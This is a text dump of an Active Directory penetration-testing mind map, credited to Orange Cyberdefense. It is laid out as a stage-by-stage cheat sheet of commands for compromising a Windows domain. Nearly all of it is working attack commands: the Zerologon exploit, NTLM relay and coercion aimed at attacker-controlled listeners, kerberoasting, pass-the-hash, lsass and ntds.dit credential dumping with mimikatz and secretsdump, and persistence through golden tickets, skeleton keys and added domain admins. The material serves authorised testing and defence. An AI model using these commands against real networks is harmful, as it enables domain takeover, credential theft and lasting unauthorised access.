Pentesting_Active_directory

Pentesting_Active_directory – XMind – Mind Mapping Software

Scan Network
1. cme smb <ip_range> # enumerate smb hosts
2. nmap -sP -p <ip> # ping scan
3. nmap -PN -sV –top-ports 50 –open <ip> # quick scan
4. nmap -PN –script smb-vuln* -p139,445 <ip> # search smb vuln
5. nmap -PN -sC -sV <ip> # classic scan
6. nmap -PN -sC -sV -p- <ip> # full scan
7. nmap -sU -sC -sV <ip> # udp scan
8. find vulnerable host
find AD IP
1. nmcli dev show eth0 # show domain name & dns
2. nslookup -type=SRV _ldap._tcp.dc._msdcs.//DOMAIN/
zone transfert
1. dig axfr <domain_name> @<name_server>
List guest access on smb share
1. enum4linux -a -u “” -p “” <dc-ip> && enum4linux -a -u “guest” -p “” <dc-ip>
2. smbmap -u “” -p “” -P 445 -H <dc-ip> && smbmap -u “guest” -p “” -P 445 -H <dc-ip>
3. smbclient -U ‘%’ -L //<dc-ip> && smbclient -U ‘guest%’ -L //<dc-ip>
4. cme smb <ip> -u ” -p ” # enumerate null session
5. cme smb <ip> -u ‘a’ -p ” # enumerate anonymous access
Enumerate ldap
1. nmap -n -sV –script “ldap* and not brute” -p 389 <dc-ip>
2. ldapsearch -x -h <ip> -s base
3. user found
Find user list
1. enum4linux -U <dc-ip> | grep ‘user:’
2. crackmapexec smb <ip> -u <user> -p ‘<password>’ –users
3. OSINT – enumerate username on internet
  1. nmap -p 88 –script=krb5-enum-users –script-args=”krb5-enum-users.realm='<domain>’,userdb=<users_list_file>” <ip>
4. user found
relay/poisoning
1. find smb not signed
  1. nmap -Pn -sS -T4 –open –script smb-security-mode -p445 ADDRESS/MASK
  2. use exploit/windows/smb/smb_relay
  3. cme smb $hosts –gen-relay-list relay.txt
  4. unsigned SMB
2. PetitPotam.py -d <domain> <listener_ip> <target_ip>
3. responder -i eth0
4. mitm6 -d <domain>
5. user & hash found
zerologon
1. python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
  secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>$@<IP> -no-pass -just-dc-user “Administrator”
  secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>
  1. python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>
mayfly (@M4yFly)
Got one account on the domain
1. Get all users
  1. GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
2. enumerate SMB share
  1. cme smb <ip> -u <user> -p <password> –shares
3. bloodhound
  1. bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
4. powerview / pywerview
5. kerberoasting
  1. Get hash
    1. GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
    2. Rubeus kerberoast
    3. hash found
  2. Get kerberoastable users
    1. Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
    2. MATCH (u:User {hasspn:true}) RETURN u
    3. MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
6. MS14-068
  1. FindSMB2UPTime.py <ip>
    1. rpcclient $> lookupnames <name>
      wmic useraccount get name,sid
      auxiliary/admin/kerberos/ms14_068_kerberos_checksum
    2. goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>’@<target>
      1. kerberos::ptc “<ticket>”
7. dnscmd.exe /config /serverlevelplugindll <\pathtodll> # need a dnsadmin user
  1. sc \DNSServer stop dns
    sc \DNSServer start dns
8. PrintNightmare
  1. CVE-2021-1675.py <domain>/<user>:<password>@<target> ‘\<smb_server_ip><share>inject.dll’
9. enum dns
  1. dnstool.py -u ‘DOMAINuser’ -p ‘password’ –record ‘*’ –action query <dc_ip>
Got valid username
1. Password spray
  1. Get password policy
    1. crackmapexec <IP> -u ‘user’ -p ‘password’ –pass-pol
    2. enum4linx -u ‘username’ -p ‘password’ -P <IP>
  2. cme smb <dc-ip> -u user.txt -p password.txt –no-bruteforce # test user=password
  3. cme smb <dc-ip> -u user.txt -p password.txt # multiple test (carrefull of lock policy)
  4. credentials found
2. ASREPRoast
  1. Get hash
    1. python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
    2. Rubeus asreproast /format:hashcat
  2. Get ASREPRoastable users
    1. Get-DomainUser -PreauthNotRequired -Properties SamAccountName
    2. MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
  3. hash found
Lateral move
1. pass the hash
  1. psexec.py -hashes “:<hash>” <user>@<ip>
  2. wmiexec.py -hashes “:<hash>” <user>@<ip>
  3. atexec.py -hashes “:<hash>” <user>@<ip> “command”
  4. evil-winrm -i <ip>/<domain> -u <user> -H <hash>
  5. xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
2. overpass the hash / pass the key (PTK)
  1. python getTGT.py <domain>/<user> -hashes :<hashes>
    1. export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
      1. python psexec.py <domain>/<user>@<ip> -k -no-pass
  2. Rubeus asktgt /user:victim /rc4:<rc4value>
    1. Rubeus ptt /ticket:<ticket>
    2. Rubeus createnetonly /program:C:WindowsSystem32[cmd.exe||upnpcont.exe]
      1. Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
3. Unconstrained delegation
  1. Get tickets
    1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
    2. Rubeus dump /service:krbtgt /nowrap
    3. Rubeus dump /luid:0xdeadbeef /nowrap
  2. Get unconstrained delegation machines
    1. Get-NetComputer -Unconstrained
    2. Get-DomainComputer -Unconstrained -Properties DnsHostName
    3. MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
    4. MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
4. Constrained delegation
  1. Get tickets
    1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
    2. Rubeus dump /service:krbtgt /nowrap
    3. Rubeus dump /luid:0xdeadbeef /nowrap
  2. Get constrained delegation machines
    1. Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
    2. MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
    3. MATCH (u:User {owned:true}), (c:Computer {name: “<MYTARGET.FQDN>”}), p=shortestPath((u)-[*1..]->(c)) RETURN p
5. Resource-Based Constrained Delegation
6. dcsync
  1. lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
7. WSUSpect
  1. WSUSpendu.ps1 # need compromised WSUS server
8. sccm
  1. CMPivot
9. MSSQL Trusted Links
  1. use exploit/windows/mssql/mssql_linkcrawler
10. Printers spooler service abuse
  1. rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
    1. printerbug.py ‘<domain>/<username>:<password>’@<Printer IP> <RESPONDERIP>
11. AD acl abuse
  1. aclpwn.py
    1. GenericAll on User
    2. GenericAll on Group
    3. GenericAll / GenericWrite / Write on Computer
    4. WriteProperty on Group
    5. Self (Self-Membership) on Group
    6. WriteProperty (Self-Membership)
    7. ForceChangePassword
    8. WriteOwner on Group
    9. GenericWrite on User
    10. WriteDACL + WriteOwner
12. GPO Delegation
13. get laps passwords
  1. Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain><login> | Format-Table -AutoSize
  2. foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
14. privexchange
  1. python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>
    1. ntlmrelayx.py -t ldap://<dc_fqdn>–escalate-user <user>
15. ADCS
Kindly provided by Orange Cyberdefense 😉
Some commands can break stuff, be sure to know what are you doing !
Please find legend below.
Bloodhound
PowerView
find hash
1. crack hash
  1. LM
    1. john –format=lm hash.txt
    2. hashcat -m 3000 -a 3 hash.txt
  2. NTLM
    1. john –format=nt hash.txt
    2. hashcat -m 1000 -a 3 hash.txt
  3. NTLMv1
    1. john –format=netntlm hash.txt
    2. hashcat -m 5500 -a 3 hash.txt
  4. NTLMv2
    1. john –format=netntlmv2 hash.txt
    2. hashcat -m 5600 -a 0 hash.txt rockyou.txt
  5. Kerberos 5 TGS
    1. john spn.txt –format=krb5tgs –wordlist=rockyou.txt
    2. hashcat -m 13100 -a 0 spn.txt rockyou.txt
  6. Kerberos ASREP
    1. hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt
relay
1. MS08-068
  1. use exploit/windows/smb/smb_relay #windows200 / windows server2008
2. responder -I eth0 # disable smb & http
  1. ntlmrelayx.py -tf targets.txt
3. mitm6 -i eth0 -d <domain>
  1. ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
  2. ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
  3. ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> –delegate-access
    1. getST.py -spn cifs/<target> <domain>/<netbios_name>$ -impersonate <user>
4. adcs
  1. ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support –adcs –template DomainController
    1. Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
Domain admin
1. dump ntds.dit
  1. crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> –ntds
  2. secretsdump.py ‘<domain>/<user>:<pass>’@<ip>
  3. ntdsutil “ac i ntds” “ifm” “create full c:temp” q q
    1. secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
  4. windows/gather/credentials/domain_hashdump
Persistance
1. net group “domain admins” myuser /add /domain
2. Golden ticket
  1. ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
3. Silver Ticket
4. DSRM
  1. PowerShell New-ItemProperty “HKLM:SystemCurrentControlSetControlLsa” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
5. Skeleton Key
  1. mimikatz “privilege::debug” “misc::skeleton” “exit”
6. Custom SSP
  1. mimikatz “privilege::debug” “misc::memssp” “exit”
    1. C:WindowsSystem32kiwissp.log
7. …
Administrator access
1. get credentials
  1. procdump.exe -accepteula -ma lsass.exe lsass.dmp
    1. mimikatz “privilege::debug” “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords” “exit”
  2. mimikatz “privilege::debug” “token::elevate” “sekurlsa::logonpasswords” “lsadump::sam” “exit”
  3. post/windows/gather/smart_hashdump
    1. hashdump
  4. cme smb <ip_range> -u <user> -p <password> -M lsassy
  5. cme smb <ip_range> -u <user> -p ‘<password>’ –sam / –lsa / –ntds
2. LSA as a Protected Process
  1. PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
  2. mimikatz “!+” “!processprotect /process:lsass.exe /remove” “privilege::debug” “token::elevate” “sekurlsa::logonpasswords” “!processprotect /process:lsass.exe” “!-” #with mimidriver.sys
3. search password files
  1. findstr /si ‘password’ *.txt *.xml *.docx
4. search stored password
  1. lazagne.exe all
5. shadow copies
  1. diskshadow list shadows all
    1. mklink /d c:shadowcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
6. token manipulation
  1. .incognito.exe list_tokens -u
    1. .incognito.exe execute -c “<domain><user>” powershell.exe
  2. use incognito
    1. impersonate_token <domain>\<user>
7. dpapi extract
Low hanging fruit
1. java rmi
  1. exploit/multi/misc/java_rmi_server
2. ms17-010
  1. exploit/windows/smb/ms17_010_eternalblue
3. tomcat/jboss manager
  1. auxiliary/scanner/http/tomcat_enum
    exploit/multi/http/tomcat_mgr_deploy
4. java serialized port
  1. ysoserial
5. vulnerable product with cve
  1. searchsploit
6. MS14-025
  1. use scanner/smb/smb_enum_gpp
  2. findstr /S /I cpassword \<FQDN>sysvol<FQDN>policies*.xml
7. database credentials
  1. use admin/mssql/mssql_enum_sql_logins
8. proxylogon
9. proxyshell
Low access
1. winpeas.exe
2. search password files
  1. findstr /si ‘password’ *.txt *.xml *.docx
3. Juicy Potato / Lovely Potato
4. PrintSpoofer
5. RoguePotato
6. SMBGhost CVE-2020-0796
7. CVE-2021-36934 (HiveNightmare/SeriousSAM)
8. …
Trust relationship
1. Child Domain to Forest Compromise – SID Hijacking
  1. Get-NetGroup -Domain <domain> -GroupName “Enterprise Admins” -FullData|select objectsid
    1. mimikatz lsadump::trust
      1. kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
2. Forest to Forest Compromise – Trust Ticket
  1. “lsadump::trust /patch”
    “lsadump::lsa /patch”
    1. “kerberos::golden /user:Administrator /domain:<domain> /sid:
      <domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:
      <golden_ticket_path>”
      1. .Rubeus.exe asktgs /ticket:<kirbi file> /service:”Service’s SPN” /ptt
3. Breaking forest trust
  1. printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dcsync

Recent Posts